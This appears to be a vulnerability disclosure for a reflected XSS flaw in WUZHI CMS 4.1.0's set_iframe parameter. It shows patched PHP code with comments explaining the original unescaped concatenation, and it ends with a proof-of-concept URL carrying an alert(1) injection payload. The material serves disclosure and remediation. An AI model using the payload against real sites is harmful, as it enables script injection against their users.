An XSS vulnerability was discovered in WUZHI CMS 4.1.0.
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the set_iframe parameter of /index.php?m=content&f=postinfo&v=listing
Vulnerable file: coreframe/app/content/postinfo.php
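/**
 * Initialise the controller: load the member class and helpers, read the
 * cached member settings, then stop members whose e-mail (and, when the
 * setting requires it, mobile number) is not yet verified.
 *
 * Security note: as reported, this constructor appended the request-supplied
 * set_iframe value to the redirect URL unmodified
 * (`...&set_iframe='.$GLOBALS['set_iframe']`), so quote characters in the
 * parameter reached the page that MSG() renders. Here the value is
 * percent-encoded before it is placed in the query string.
 */
function __construct() {
    $this->member = load_class('member', 'member');
    load_function('common', 'member');
    $this->member_setting = get_cache('setting', 'member');
    // NOTE(review): $this->memberinfo is presumably populated by the parent
    // constructor; that code is not shown here.
    parent::__construct();

    // Treat set_iframe as untrusted: accept scalars only and percent-encode,
    // so quotes, angle brackets and '&' cannot leave the query-string value.
    $set_iframe = '';
    if (isset($GLOBALS['set_iframe']) && is_scalar($GLOBALS['set_iframe'])) {
        $set_iframe = rawurlencode((string) $GLOBALS['set_iframe']);
    }

    // Check whether the current member has verified e-mail and mobile.
    // NOTE(review): MSG() is defined elsewhere. Encoding at the call site is
    // defence in depth; MSG() should still escape the URL for the context it
    // writes it into (HTML attribute, script string) — confirm in its template.
    if (!$this->memberinfo['ischeck_email']) {
        MSG('请先验证您的邮箱!', '?m=member&f=index&v=edit_email&set_iframe=' . $set_iframe, 3000);
    }
    if ($this->member_setting['checkmobile'] && !$this->memberinfo['ischeck_mobile']) {
        MSG('您的手机还未验证!请先验证!', 'index.php?m=member&f=index&v=edit_mobile&set_iframe=' . $set_iframe, 3000);
    }
}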
PoC:
http://example.com/index.php?m=content&f=postinfo&v=listing&set_iframe='-alert(1)-'